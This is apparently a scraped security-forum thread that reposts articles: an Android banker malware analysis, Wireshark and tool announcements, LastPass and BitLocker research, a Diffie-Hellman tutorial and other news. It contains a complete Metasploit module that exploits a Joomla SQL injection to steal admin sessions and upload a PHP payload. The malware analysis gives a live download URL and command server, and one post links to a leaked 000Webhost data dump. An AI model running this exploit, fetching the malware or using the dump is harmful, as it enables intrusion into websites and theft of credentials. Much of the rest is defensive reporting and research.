Nytro

[h=3]Android malware drops Banker from PNG file[/h] Nowadays is malware trying to hide wherever it is possible to get under the radar of anti-virus companies. Lately I found Trojan dropper carrying malicious payload, encoded by base64, embedded inside an image file. It’s nothing special these days but it is very rare dropping technique. In the most cases are malware authors lazy enough to not even encrypt the payload file. [h=3]Analysis[/h] In the time of writing this blog post is this Trojan dropper still available to download from attacker server (hxxp://jackdojacksgot.ru/img/Update.apk). Based on VirusTotal is detection for this Trojan dropper very poor. [TABLE=align: center] [TR] [TD][/TD] [/TR] [TR] [TD] Figure 1 VirusTotal detection [/TD] [/TR] [/TABLE] This malicious application masquerade itself as Adobe Flash Player. Based on alternative names I found in application resources malware name can be different in the other versions like: Viber New, App4porno,CommBank, My Online Security, Viber or Whatsapp. [TABLE=align: center] [TR] [TD][/TD] [/TR] [TR] [TD] Figure 2 Possible Trojan dropper names [/TD] [/TR] [/TABLE] After launch, Trojan will immediately drop and request user to install Adobe Flash Player. But first let’s take a look on dropping technique. In app assets there is nothing else to drop other than image file. [TABLE=align: center] [TR] [TD][/TD] [/TR] [TR] [TD] Figure 3 Trojan dropper assets [/TD] [/TR] [/TABLE] There is only one image of dices stored in assets, but it size is more than 3.6 MB and that’s bit suspicious. After inspecting the code application wasn’t dropping this PNG file. The Trojan dropper at first opens this image file and searches for delimiter string, in this case "12345678901234567890". Right after this delimiter is stored another application encoded by Base64. [TABLE=align: center] [TR] [TD][/TD] [/TR] [TR] [TD] Figure 4 Dropping embedded malware [/TD] [/TR] [/TABLE] [TABLE=align: center] [TR] [TD][/TD] [/TR] [TR] [TD] Figure 5 Binary view of PNG file [/TD] [/TR] [/TABLE] Decoded data are then stored on external storage as “prefix.apk” and demand to install. Decoded application, prefix.apk, is heavily obfuscated Android banker, stealing user credentials. After installation it requests user to activate Administrator rights for application. This is the simplest method that prevents to uninstall this Trojan. [TABLE=align: center] [TR] [TD][/TD] [/TR] [TR] [TD] Figure 6 Banker install and device administrator request [/TD] [/TR] [/TABLE] If user tries to deactivate Administrator rights then is repeatedly asked to activate it again. There are two ways how to get rid of this nasty banker. Either by going to safe mode of your device and deactivate Administrator rights and uninstall it or by using Android Debug Bridge (adb) and uninstall it from your computer. Both apps Trojan dropper and dropped banker are the most probably obfuscated and protected by DexProtector. It’s very complicated to analyze it statically without any dynamical intervention. [TABLE=align: center] [TR] [TD][/TD] [/TR] [TR] [TD] Figure 7 Code obfuscation [/TD] [/TR] [/TABLE] Banker can steal user login credentials or credit card information with phishing technique. When user opens his mobile banking application or just Google Play Store, malicious activity will be displayed on the top of the official application. This way user can be easily fooled and insert sensitive information to banker pop-up window. [TABLE=align: center] [TR] [TD][/TD] [/TR] [TR] [TD] Figure 8 Bankers phishing windows [/TD] [/TR] [/TABLE] User credentials are immediately sent to remote server. [TABLE=align: center] [TR] [TD][/TD] [/TR] [TR] [TD] Figure 9 Send stolen credentials for Gmail app [/TD] [/TR] [/TABLE] [TABLE=align: center] [TR] [TD][/TD] [/TR] [TR] [TD] Figure 10 Send stolen credentials for CommBank app [/TD] [/TR] [/TABLE] [TABLE=align: center] [TR] [TD][/TD] [/TR] [TR] [TD] Figure 11 Send stolen credentials for PayPal app [/TD] [/TR] [/TABLE] This banker is very popular. Lately I tweeted about same banker but stored on different server. [h=3]More information[/h] HASH dropper: 1F41BA0781D51751971EE705DFA307D2 HASH PNG: 575551FBC343EC8E1A1C771D81963096 HASH dropped: 90886B56372F5191A78A20DCB3F9FE6E Download link: http://jackdojacksgot.ru/img/Update.apk Remote server: 75jng75ufnf.ru:2080 Posted by Lukas Stefanko at 11:47 PM Sursa: http://b0n1.blogspot.ro/2015/11/android-malware-drops-banker-from-png.html

Network protocol analyzer Wireshark 2.0 released Posted on 24 November 2015. Wireshark, the most popular network protocol analyzer, has reached version 2.0. It features a completely new user interface which should provide a smoother, faster user experience. Here's an in-depth video introduction to Wireshark 2.0 The libwireshark API has undergone some major changes: The emem framework (including all ep_ and se_ memory allocation routines) has been completely removed in favour of wmem which is now fully mature. The (long-since-broken) Python bindings support has been removed. If you want to write dissectors in something other than C, use Lua. Plugins can now create GUI menu items. Heuristic dissectors can now be globally enabled/disabled so heur_dissector_add() has a few more parameters to make that possible proto_tree_add_text has been removed. tvb_length() has been removed in favor of tvb_reported_length() and tvb_captured_length(). The API for ONC RPC-based dissectors has changed significantly: the procedure dissectors no longer take an offset, void-argument procedures now need to be declared with a function (use dissect_rpc_void()), and rpc_init_prog() now handles procedure registration too (it takes additional arguments to handle this; rpc_init_proc_table() was removed). The following features are new (or have been significantly updated) since version 2.0.0rc3: An RTP player crash has been fixed. Flow graph issues have been fixed. A Follow Stream dialog crash has been fixed. An extcap crash has been fixed. A file merge crash has been fixed. A handle leak crash has been fixed. Several other crashes and usability issues have been fixed. Sursa: http://www.net-security.org/secworld.php?id=19147

autopwn Specify targets and run sets of tools against them autopwn is designed to make a pentester's life easier and more consistent by allowing them to specify tools they would like to run against targets, without having to type them in a shell or write a script. This tool will probably be useful during certain exams as well.. Installation It is recommended that you use the docker image while exposing TCP 5000 for autopwn clients to connect to. This is because the autopwn docker image is already setup (tools are installed and in the right place). Only allow this package to listen on a loopback IP address. If you have this package listen on a public IP, you're allowing arbitrary users to execute commands as root on your server. Eventually, HTTPS and credentials will be required, but for now, don't be a moron. From Docker Execute docker pull rascal999/autopwn Run docker run -i -t -p 127.0.0.1:5000:5000 rascal999/autopwn /usr/sbin/autopwn Run autopwn client (you can get the Java application at https://github.com/rascal999/autopwn-gui) From the Python Package Index (for development) Execute pip install autopwn From this repository Clone the Git repository Change into the newly created directory Execute pip install . Usage Running autopwn will start the web server. Sample output * Running on http://127.0.0.1:5000/ (Press CTRL+C to quit) * Restarting with stat 127.0.0.1 - - [15/Nov/2015 11:04:41] "GET /ping HTTP/1.1" 200 - 127.0.0.1 - - [15/Nov/2015 11:04:41] "GET /favicon.ico HTTP/1.1" 404 - In order to interface with autopwn you should use autopwn-gui (available at https://github.com/rascal999/autopwn-gui). You can also use autopwn-cli (available at https://github.com/rascal999/autopwn-cli). If you're interested in the API, you can also do stuff in the browser. Contributing Fork it! Create your feature branch: git checkout -b my-new-feature Commit your changes: git commit -am 'Add some feature' Push to the branch: git push origin my-new-feature Submit a pull request Credits Developed by Aidan Marlin (aidan [dot] marlin [at] nccgroup [dot] com) while working at NCC Group. I'd like to thank the following contributors for their work on previous autopwn versions: Selfegris 0xsauby berdario Sursa: https://github.com/nccgroup/autopwn

[h=1]Joomla Content History SQLi Remote Code Execution[/h] ### This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::FileDropper def initialize(info={}) super(update_info(info, 'Name' => "Joomla Content History SQLi Remote Code Execution", 'Description' => %q{ This module exploits a SQL injection vulnerability found in Joomla versions 3.2 up to 3.4.4. The vulnerability exists in the Content History administrator component in the core of Joomla. Triggering the SQL injection makes it possible to retrieve active Super User sessions. The cookie can be used to login to the Joomla administrator backend. By creating a new template file containing our payload, remote code execution is made possible. }, 'License' => MSF_LICENSE, 'Author' => [ 'Asaf Orpani', # Vulnerability discovery 'xistence <xistence[at]0x90.nl>' # Metasploit module ], 'References' => [ [ 'CVE', '2015-7857' ], # Admin session hijacking [ 'CVE', '2015-7297' ], # SQLi [ 'CVE', '2015-7857' ], # SQLi [ 'CVE', '2015-7858' ], # SQLi [ 'URL', 'https://www.trustwave.com/Resources/SpiderLabs-Blog/Joomla-SQL-Injection-Vulnerability-Exploit-Results-in-Full-Administrative-Access/' ], [ 'URL', 'http://developer.joomla.org/security-centre/628-20151001-core-sql-injection.html' ] ], 'Payload' => { 'DisableNops' => true, # Arbitrary big number. The payload gets sent as POST data, so # really it's unlimited 'Space' => 262144, # 256k }, 'Platform' => ['php'], 'Arch' => ARCH_PHP, 'Targets' => [ [ 'Joomla 3.x <= 3.4.4', {} ] ], 'Privileged' => false, 'DisclosureDate' => "Oct 23 2015", 'DefaultTarget' => 0)) register_options( [ OptString.new('TARGETURI', [true, 'The base path to Joomla', '/']) ], self.class) end def check # Request using a non-existing table res = sqli(rand_text_alphanumeric(rand(10)+6)) if res && res.body =~ /`(.*)_ucm_history`/ return Exploit::CheckCode::Vulnerable end return Exploit::CheckCode::Safe end def sqli( tableprefix ) # SQLi will only grab Super User sessions with a valid username and userid (else they are not logged in). # The extra search for NOT LIKE '%IS NOT NULL%' is because of our SQL data that's inserted in the session cookie history. # This way we make sure that's excluded and we only get real admin sessions. sql = " (select 1 FROM(select count(*),concat((select (select concat(session_id)) FROM #{tableprefix}session WHERE data LIKE '%Super User%' AND data NOT LIKE '%IS NOT NULL%' AND userid!='0' AND username IS NOT NULL LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a)" # Retrieve cookies res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, "index.php"), 'vars_get' => { 'option' => 'com_contenthistory', 'view' => 'history', 'list[ordering]' => '', 'item_id' => '1', 'type_id' => '1', 'list[select]' => sql } }) return res end def exploit # Request using a non-existing table first, to retrieve the table prefix res = sqli(rand_text_alphanumeric(rand(10)+6)) if res && res.code == 500 && res.body =~ /`(.*)_ucm_history`/ table_prefix = $1 print_status("#{peer} - Retrieved table prefix [ #{table_prefix} ]") else fail_with(Failure::Unknown, "#{peer} - Error retrieving table prefix") end # Retrieve the admin session using our retrieved table prefix res = sqli("#{table_prefix}_") if res && res.code == 500 && res.body =~ /Duplicate entry '([a-z0-9]+)' for key/ auth_cookie_part = $1[0...-1] print_status("#{peer} - Retrieved admin cookie [ #{auth_cookie_part} ]") else fail_with(Failure::Unknown, "#{peer}: No logged-in admin user found!") end # Retrieve cookies res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, "administrator", "index.php") }) if res && res.code == 200 && res.get_cookies =~ /^([a-z0-9]+)=[a-z0-9]+;/ cookie_begin = $1 print_status("#{peer} - Retrieved unauthenticated cookie [ #{cookie_begin} ]") else fail_with(Failure::Unknown, "#{peer} - Error retrieving unauthenticated cookie") end # Modify cookie to authenticated admin auth_cookie = cookie_begin auth_cookie << "=" auth_cookie << auth_cookie_part auth_cookie << ";" # Authenticated session res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, "administrator", "index.php"), 'cookie' => auth_cookie }) if res && res.code == 200 && res.body =~ /Administration - Control Panel/ print_status("#{peer} - Successfully authenticated as Administrator") else fail_with(Failure::Unknown, "#{peer} - Session failure") end # Retrieve template view res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, "administrator", "index.php"), 'cookie' => auth_cookie, 'vars_get' => { 'option' => 'com_templates', 'view' => 'templates' } }) # We try to retrieve and store the first template found if res && res.code == 200 && res.body =~ /\/administrator\/index.php\?option=com_templates&view=template&id=([0-9]+)&file=([a-zA-Z0-9=]+)/ template_id = $1 file_id = $2 else fail_with(Failure::Unknown, "Unable to retrieve template") end filename = rand_text_alphanumeric(rand(10)+6) # Create file print_status("#{peer} - Creating file [ #{filename}.php ]") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, "administrator", "index.php"), 'cookie' => auth_cookie, 'vars_get' => { 'option' => 'com_templates', 'task' => 'template.createFile', 'id' => template_id, 'file' => file_id, }, 'vars_post' => { 'type' => 'php', 'name' => filename } }) # Grab token if res && res.code == 303 && res.headers['Location'] location = res.headers['Location'] print_status("#{peer} - Following redirect to [ #{location} ]") res = send_request_cgi( 'uri' => location, 'method' => 'GET', 'cookie' => auth_cookie ) # Retrieving template token if res && res.code == 200 && res.body =~ /&([a-z0-9]+)=1\">/ token = $1 print_status("#{peer} - Token [ #{token} ] retrieved") else fail_with(Failure::Unknown, "#{peer} - Retrieving token failed") end if res && res.code == 200 && res.body =~ /(\/templates\/.*\/)template_preview.png/ template_path = $1 print_status("#{peer} - Template path [ #{template_path} ] retrieved") else fail_with(Failure::Unknown, "#{peer} - Unable to retrieve template path") end else fail_with(Failure::Unknown, "#{peer} - Creating file failed") end filename_base64 = Rex::Text.encode_base64("/#{filename}.php") # Inject payload data into file print_status("#{peer} - Insert payload into file [ #{filename}.php ]") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, "administrator", "index.php"), 'cookie' => auth_cookie, 'vars_get' => { 'option' => 'com_templates', 'view' => 'template', 'id' => template_id, 'file' => filename_base64, }, 'vars_post' => { 'jform[source]' => payload.encoded, 'task' => 'template.apply', token => '1', 'jform[extension_id]' => template_id, 'jform[filename]' => "/#{filename}.php" } }) if res && res.code == 303 && res.headers['Location'] =~ /\/administrator\/index.php\?option=com_templates&view=template&id=#{template_id}&file=/ print_status("#{peer} - Payload data inserted into [ #{filename}.php ]") else fail_with(Failure::Unknown, "#{peer} - Could not insert payload into file [ #{filename}.php ]") end # Request payload register_files_for_cleanup("#{filename}.php") print_status("#{peer} - Executing payload") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, template_path, "#{filename}.php"), 'cookie' => auth_cookie }) end end Sursa: https://www.exploit-db.com/exploits/38797/

A programmer wrote scripts to secretly automate a lot of his job — and email his wife and make a latte Julie Bort There's a hilarious project that's popular on GitHub, the website that hosts all kinds of software that programmers want to share with each other. The project was shared by a programmer named Nihad Abbasov, known as "Narkoz" on GitHub. It consists of a bunch of software scripts with some funny but NSFW names. Narkoz says that the scripts came from one of his coworkers who left for another company, the type of guy that "if something — anything — requires more than 90 seconds of his time, he writes a script to automate that." After the guy left for a new job, his former coworkers were looking through his work and discovered that the guy had automated all sorts of crazy things, including parts of his job, his relationships, and making coffee. The guy wrote one script that sends a text message "late at work" to his wife and "automatically picks reasons" from a preset list of them, saysNarkoz. It sent this text anytime there was activity with his login on the company's computer servers after 9 p.m. He wrote another script relating to a customer he didn't like, given the not-nice name he chose for this script. It scans his inbox for an email from the customer that uses words like "help," "trouble," and "sorry" and automatically rolls the guy's database to the latest backup, then sends a reply: "No worries mate, be careful next time." With another script, he automatically fired off an email excuse like "not feeling well, working from home" if he wasn't at work and logged in to the servers by 8:45 a.m. He called that script "hangover." And the best one? He wrote a script that waits 17 seconds, then hacks into the coffee machine and orders it to start brewing a latte. The script tells the machine to wait another 24 seconds before pouring the latte into a cup, the exact time it takes to walk from the guy's desk to the coffee machine. And his coworkers didn't even know the coffee machine was on the network and hackable. Sursa: http://www.businessinsider.com/programmer-automates-his-job-2015-11

As a side project I have been doing some self-study on encryption to better understand it. It is how we protect our data as it travels across the internet or when at rest, we use concepts from it to verify that we sent messages, and whole currency schemes are built around the idea. Encryption is an incredibly dense topic and it is easy to mess up. As such, all of the code I have written should not be used for any real encryption. The goal here is to make some of the concepts easier to understand. For those interested in learning more about the history, I quite enjoyed The Code Book. As for a more in-depth understanding of cryptography, take a look at Cryptography Engineering. Then you and I can struggle through it together! Diffie-Hellman Key Exchange The first topic for encryption we will go over is the Diffie-Hellman Key Exchange (DHKE). I think there is no better way to explain the basics than how Wikipediadoes, specifically in the image below. Alice and Bob want to share a key to encrypt their communications. Using paint (instead of math) we think of it like so: Alice and Bob decide on a common paint color Alice and Bob pick their own secret paint color Alice and Bob combine their secret color with the common color Alice and Bob trade this mixed paint Alice mixes Bob’s paint with her secret color Bob mixes Alice’s paint with his secret color Now Alice and Bob have a shared secret color (Alice and Bob will be recurring characters so you will have to get used to them!) DHKE described using paint (courtesty Wikipedia) The Key This section is more of a big picture section, so if you already have a basic understanding of encryption feel free to move on (or not, maybe you enjoy reading what I write). A key, in cryptography, is used to lock and unlock a message. But imagine trying to share a key and send a message to someone via a courier. If the message is clear text, the courier can read it. So we encrypt it. How do we then share a key with that person to decrypt it? If we just send the key, then the courier has that also and can decrypt it. DHKE aims to solve that problem. Let’s take a look at a working example. A Working Example I wrote some code to handle this which you can find here. Below is the output you can see from running it (with some flags to make it more verbose). DHKE between Alice and Bob A note on my iconography: x -> y : means x sends a message to y Internal means that it is occurring locally for that person First Alice tells Bob to set his prime base to 5 (and Eve, who is attempting to eavesdrop, sees this). Then Alice tells Bob to set his prime mod to 23 (which Eve also sees). Then both Alice and Bob create a random secret and perform a calculation using that secret and the prime base and prime mod. Then Alice tells Bob the result of her calculation and vice versa (and Eve sees both of these). Finally they perform one more set of calculations and arrive at a shared secret. DHKE In Math So how does this actually work? Modular arithmetic to the rescue! The equation that we are looking at is g^x mod p. g and p combine (sort of) to make our common paint. There are some restrictions around what numbers we are allowed to choose for g and x, one of which I discuss later, but we do know that p is prime. x is where this gets interesting. Alice and Bob will each select their own secret number for this (their secret paint as it were), a and b respectively. This can be any number. Then each calculates g^x mod p, and shares it (their mixed paint). Now Alice has g^b mod p (B from now on) from Bob and Bob has g^a mod p (A from now on) from Alice (Eve would have these as well). Then each takes their secret key and combines it mod p with the number they received. So Alice has B^a mod p and Bob has A^b mod p, which is their secret key. Wait, B^a mod p and A^b mod p are the secret keys? That must mean they are the same value! How cool is that? Let’s go back through the steps to understand it better. Alice and Bob decide on two numbers g and p. Alice and Bob select a secret number, a and b respectively Alice and Bob calculate g ^ x mod p where x is their number Alice and Bob share these numbers (A and Alice and Bob combine the shared number with their secret to generate the shared secret So let’s look at what we have at step 5: Alice has: B^a mod p = (g^b mod p) ^ a mod p = g^ab mod p Bob has: A^b mod p = (g^a mod p) ^ b mod p = g^ab mod p You might be saying, I still don’t get why that works. This is where a deeper understanding of modular arithmetic comes in handy. I will walk you through some of the basics (or not, if you have already had enough math, but I would say soldier on, you only need elementary math knowledge for the most part). When we calculate something like y mod z what we are really calculating is the remainder of y / z (or y % z in a lot of programming languages). When y < z then y % z is y. When it is larger it works like a clock. As y grows y % z will go through all values 0 to z – 1 until it is a multiple of z and then it will go back to 0 and then it will proceed through all of those values again. It turns out that the exponentiation operation in modular arithmetic is transitive. So (a ^ ^ c mod d = (a ^ c) ^ b mod d = a^ (bc) mod d. So Alice is calculating (g^b mod p) ^ a mod p which is (g^^a mod p. From that, both sides end up having g^ab mod p. This is where one of the restrictions on g and p comes in. For a ^ b mod c, the possible results can be limited depending on the numbers selected. Let’s look at an example: a ^ b mod 7. 2 ^ 1 mod 7 = 2 mod 7 = 2 2 ^ 2 mod 7 = 4 mod 7 = 4 2 ^ 3 mod 7 = 8 mod 7 = 1 2 ^ 4 mod 7 = 16 mod 7 = 2 2 ^ 5 mod 7 = 32 mod 7 = 4 2^ 6 mod 7 = 64 mod 7 = 1 … See where that is an issue? It only results in 3 numbers which means that the possible secret keys are only half of all numbers less than 7 can be a key (and limiting the key space is a bad thing!). So instead we pick a number like 3: 3 ^ 1 mod 7 = 3 mod 7 = 3 3 ^ 2 mod 7 = 9 mod 7 = 2 3 ^ 3 mod 7 = 27 mod 7 = 6 3 ^ 4 mod 7 = 81 mod 7 = 4 3 ^ 5 mod 7 = 243 mod 7 = 5 3^ 6 mod 7 = 729 mod 7 = 1 …. Here we can see that 3^x mod 7 can be any number less than 7, so our key space is larger. If you want to learn more about that it’s called a primitive root modulo n. The Benefits Alice and Bob have managed to generate the same number, but how does that solve this problem. Let’s look at this from Eve’s perspective. What Eve see’s from Alice and Bob’s DHKE Without any of the flags, the output shows what Eve can see only. In this example, Eve sees g and p as well as A and B. To determine what the secret key is, Eve needs to determine what a (or is, which means solving this equation for a: A = g^a mod p. As it turns out, this is a very tough equation to solve. These tough problems are often called trap door functions, functions that are easy to calculate in one direction, but not in the other (some doors you can’t come back from). This problem is specifically called the discrete logarithm problem, if you’re interested in looking further. That means that Alice and Bob have shared a number, over an insecure medium, without revealing what that number is. Using that number, they can now send messages that are encrypted that they both can decrypt. Yay! Now you know a little bit more about DHKE and how we protect our secrets. To promote further security, we actually will regenerate a key for each session. So if one of your keys traded in this manner is ever actually calculated, it only affects that session. This is what we call forward secrecy! I have two more concepts on deck to talk about soon (you may have noticed the git repository), the RSA algorithm for asymmetric encryption and HMACs. Once I have them completed the last sentence will contain links! Go forth and hack encrypt! References: https://en.wikipedia.org/wiki/Diffie%E2%80%93Hellman_key_exchange https://en.wikipedia.org/wiki/Discrete_logarithm_problem https://en.wikipedia.org/wiki/Primitive_root_modulo_n Malarkey Sursa: https://warroom.securestate.com/index.php/encryption-basics-dhke/

Alleged Malware Service Operators Arrested in UK By Eduard Kovacs on November 23, 2015 A partnership between the security firm Trend Micro and the United Kingdom’s National Crime Agency (NCA) resulted in the arrests of two individuals suspected of running a website that offered cybercrime services. The suspects, a man and a woman aged 22 from Colchester, Essex, are believed to have operated a counter antivirus service called reFUD.me and a crypting service named Cryptex Reborn. They have been released on bail until February 2016. Both the Cryptex Reborn and reFUD.me services have been disrupted as a result of the operation. ReFUD.me, which emerged in February 2015, allowed cybercriminals to upload their malware samples to see if they would be detected by the products of various antivirus companies. ReFUD.me was similar to VirusTotal, but unlike the Google-owned scanning service, it did not share scanned files with antivirus vendors. Before it was shut down, the reFUD.me website claimed that more than 1.2 million scans had been conducted since February 2015. One of the most recent features added to the cybercrime service, dubbed “scanwatch,” allowed users to constantly monitor the detection status of the files they uploaded. Cryptex Reborn, the evolution of a toolkit advertised since as early as October 2011, allowed malware developers to encrypt their files in an effort to make them “Fully UnDetectable” (FUD). Malware authors could use the product after paying a $20 monthly subscription fee or $90 for lifetime usage. The first versions of the tool, called Cryptex, Cryptex Lite and Cryptex Advanced, all surfaced in 2011. Cryptex Reborn, which is said to offer one of the most sophisticated forms of crypting seen in recent years, was first advertised on cybercrime forums in September 2014, said Trend Micro. “This investigation is the result of Trend Micro’s collaboration with the National Crime Agency of the UK (NCA) and other partners to tackle some of the core components that enable cybercriminal business models to exist,” said Martin Rösler, senior director of The Forward-Looking Threat Research team for Trend Micro. “Helping to take down operations such as this is part of our ongoing effort to keep the world safe for exchanging digital information, for both our customers and the Internet at large.” The collaboration between Trend Micro and the NCA is the result of a memorandum of understanding signed by the two organizations in July. Sursa: http://www.securityweek.com/alleged-malware-service-operators-arrested-uk

E bolnav, are cafenorologie. Trebuie sa facem niste donatii de expresso urgent!

https://veracrypt.codeplex.com/ https://ciphershed.org/ https://truecrypt.ch/

Clasic:

Small toolkit for easy creation and usage of various python scripts that work with embedded devices. core - contains most of toolkits basic functions databases - contains databases, like default credentials etc. interface - contains code that is being used for the creation and manipulation with interface modules - contains structure of modules, that can be loaded, every module contains vendor specific sub-modules where scripts are stored. decryptors exploits harvesters misc scanners [*]output - output goes here This is still heavy work-in progress Link: https://github.com/j91321/rext

Flaws found in LastPass password manager by security researchers David Bisson November 17, 20159:30 pm Two security researchers have discovered a number of bugs, bad practices, and design issues in the popular LastPass password manager. Martin Vigo and Alberto Garcia Illera, both security engineers at Salesforce.com, recently presented their analysis of LastPass at Black Hat Europe 2015. In a blog post describing their findings, Vigo and Garcia say that after conducting some preliminary research, the duo decided to see if they could attack LastPass's password vault directly and obtain access to LastPass credentials via three different techniques: client-side attacks, LastPass-side attacks, and attacks from the outside. Regarding the first method of attack, the researchers found a way to exploit session cookies, allowing them to gain access to the encrypted vault key. "We can use the session cookie to query LastPass and obtain the pwdeckey value," the duo explained. "Once we have that, we can derive a key by doingSHA256(pwdeckey). Now we just need to extract the encrypted vault key from the SQLite DB and decrypt it using the key we just derived." After unearthing some weaknesses in the way LastPass configured its two-factor authentication protocols, Vigo and Garcia eventually found a way to recover a disabled One Time Password (known as a dOTP, and which the researchers describe as a "master password on steroids") that is stored locally on a user's machine. "This is key to understand the advantage of this attack versus stealing the master password which needs the victim to have previously clicked 'Remember Password'," the researchers note. The duo finally used the dOTP to obtain the session cookie and the encrypted vault key, which they decrypted using the dOTP. Moving on to LastPass-side attacks, Vigo and Garcia found that the vault itself was not encrypted per se but instead presented cleartext metadata with encrypted values. (The URLs/icons were only encoded, whereas credentials were encrypted using a weak method.) They also found that LastPass added a "custom_js" parameter to every Account node: "Javascript code that will be injected and run in every page load in the domain’s context. While this is a legitimate feature, it gives LastPass the possibility of stealing all your credentials." For outside attacks, the researchers do not go into too much detail in the blog post, and instead direct readers to view the slides of their talk. At first glance, these bugs with LastPass might seem to endorse the actions of those who - against the advice of some - immediately decided to migrate away from LastPass after the company was bought by LogMeIn. But, as Vigo and Garcia note, LastPass may not be the only password manager with vulnerabilities, and its development team have at least responded to the findings in what seems to be a responsible and timely manner: We found a number of bugs, bad practices and design issues and used them to obtain the vault key and decrypt all passwords in different scenarios. There is no bug-free software and any future research on other password managers would likely have similar results. LastPass has responded and fixed most of the issues in less than 72 hours. "We want to point out that the security team at LastPass responded very quickly to all our reports and lot of the issues were fixed in just a couple days," the pair explain. "It was very easy to communicate and work with them." Password managers can have their weaknesses, but as pointed out by Bob Covello on Tripwire's The State of Security blog, even faulty password managers are a good choice versus users storing their passwords in local files. LastPass has taken responsibility for its bugs; it stands to reason that many of these issues will therefore not resurface going forward. Sursa: https://grahamcluley.com/2015/11/flaws-lastpass-password-manager-security-researchers/

Researcher Demonstrates Simple BitLocker Bypass By SecurityWeek News on November 18, 2015 BitLocker, the disk encryption solution implemented in the Windows operating system starting with Windows Vista, does not require sophisticated tools or exploits to be bypassed on systems that do not have the latest patches from Microsoft installed, security researcher Ian Haken claims. With the help of BitLocker, users can lock their entire computer with full-disk encryption, thus ensuring that an attacker cannot access data. BitLocker is available on professional and enterprise versions of Windows and was also designed to protect the pre-boot process from modification using the Trusted Platform Module (TPM), which is also being used to safely store its secret key for the full-disk encryption. A TPM is a hardware chip designed to performing cryptographic operations and to store secrets, and its use enables BitLocker to decrypt the operating system partition on boot without requiring pre-boot authentication. However, there is the option to require re-boot authentication, meaning that the user has to supply a PIN or insert a USB key containing a saved secret key. One of the Security Support Providers (SSPs) in Windows is Kerberos, and Ian Haken, a researcher at security firm Synopsys, discovered a vulnerability that could allow an attacker to bypass the Kerberos authentication and to decrypt drives encrypted with BitLocker. For the exploit to be successful, however, BitLocker on the target system has to be enabled without a PIN or USB key (pre-boot authentication), the machine should be domain-joined, and the attacker needs physical access to it. To bypass authentication, Haken explained that the attacker needs to set up a Kerberos Key Distribution Center (KDC), needs control of the network communication and needs to direct communication to the attacker-controlled “mock" domain controller. By connecting the machine to the mock domain controller (DC), the attacker can trigger a password reset action, thus gaining access to the encrypted drives. According to the researcher, in this scenario, the attacker does not know the user password and the machine password, although it controls both the Windows login screen and the mock DC account database where they will be setting a new user password. To be successful, the attacker needs to trigger the password change Kerberos protocol by setting the mock DC to inform the workstation that the user password has expired. According to Haken, the DC does not have to provide authentication and the workstation prompts the user for a new password, thus allowing the attacker to initiate the exchange. Since the new password is not present on the DC, the login attempt will fail, but the attacker gains access to the machine by disabling network communication, which results in the workstation reverting to local account credentials, now known to the attacker. “This attack is 100% reliable on affected systems, is not sophisticated (no custom tool was developed, no patches to Samba were necessary, and it was executed with just a few shell commands), and can be executed in a matter of seconds. Configuring Samba manually, this can be done in under a minute. If a tool was written to respond automatically based on DNS/Kerberos requests (thus automatically determining the domain/realm and the username), this could be used to bypass the login screen in a matter of seconds,” the researcher explained. Microsoft resolved the vulnerability in last week’s set of patches (Patch Tuesday) by adding an additional authentication check and claims that it was unaware of any attack attempting to exploit this bypass at the time the fix was released. The issue was found to affect all Windows versions from Windows Vista Service Pack 2 onwards, except for Windows RT or Windows RT 8.1, the company explains in a security bulletin. Sursa: Researcher Demonstrates Simple BitLocker Bypass | SecurityWeek.Com

Thanks, tehnic vorbind, nu contine nimic Practic, nici partea a II-a nu acopera "shellcodes", dar in partea a III-a, sper eu, multi vor putea intelege cum se scriu.

Introduction to Windows shellcode development – Part 1 October 30, 2015 Ionut Popescu This article contains an overview of shellcode development techniques and their specific aspects. Understanding these concepts allows you to write your own shellcode. Furthermore, you could modify existing exploits that contain already made shellcode to perform custom functionality that you need. Introduction Let’s say you have a working exploit in Internet Explorer or Flash Player that openscalc.exe. This isn’t really useful, is it? What you really want is to execute some remote commands or to do other useful functionality.In this situation you may want to use standard existing shellcode as the ones from Shell Storm database or generated by from Metasploit’s msfvenom tool. However, you must first understand the basic principles of shellcoding so you can use them effectively in your exploits. Article: http://securitycafe.ro/2015/10/30/introduction-to-windows-shellcode-development-part1/

Link: Oferta: dam tot 13 noiembrie - DOMO.ro Info: Domo isi va inchide toate magazinele - surse - IT - HotNews.ro Edit: Nu e cine stie ce.

000Webhost Data Dump https://000webhost.thecthulhu.com/

Ashampoo Burning Studio 2016 (alternativa Nero) – Licenta GRATUITA By Radu FaraVirusi(com) on November 15, 2015 Ashampoo Burning Studio 2016 este un program excelent pentru inscriptionarea CD\DVD\Blu-Ray. Este de asemenea un bun inlocuitor pentru clasicul Nero Burning Room, care are cateva dezavantaje printre care: NU este gratuit si are o multime de programele inutile care se instaleaza odata cu programul principal, ocupand spatiu si resurse. Acum puteti obtine acest software complet GRATUIT. Programul costa in mod normal 50$ si ofera multe functii (iar noutatile aduse in versiunea 2016 sunt subliniate): High DPI aware Suport pentru formatul audio OPE Suport pentru formatul audio APE Acces rapid la functii prin jump list (Windows 7 si urmatoarele) Arhivare permanenta prin tehnologia M-DISC Integrare superioara in Windows 10 cu suport pentru notificari crearea CD\DVD\Blu-Ray de tip Data functie de Backup\Restore realizare de DVD-Video, Video CD si Super Video CD copiere CD\DVD\Blu-Ray inscriptionare si crearea de imagini .iso, .cue\bin, ashdisc crearea de CD-uri Audio si MP3 plus Ripping Creeaza si imprima etichete si coperti pentru disc-urile tale Iata cum obtineti licenta GRATUITA: Accesati site-ul de mai jos pentru a obtine codul de inregistrare: https://www.ashampoo.com/frontend/registration/php/trial_step1.php?session_langid=2&edition_id=lhm40nql56aiecrchpy5oudw1tszrby0&ref=linktarget Descarcati produsul de aici: https://cdn2.ashampoo.net/public/ashglob/4610/ashampoo_burning_studio_2016_21653.exe Via: 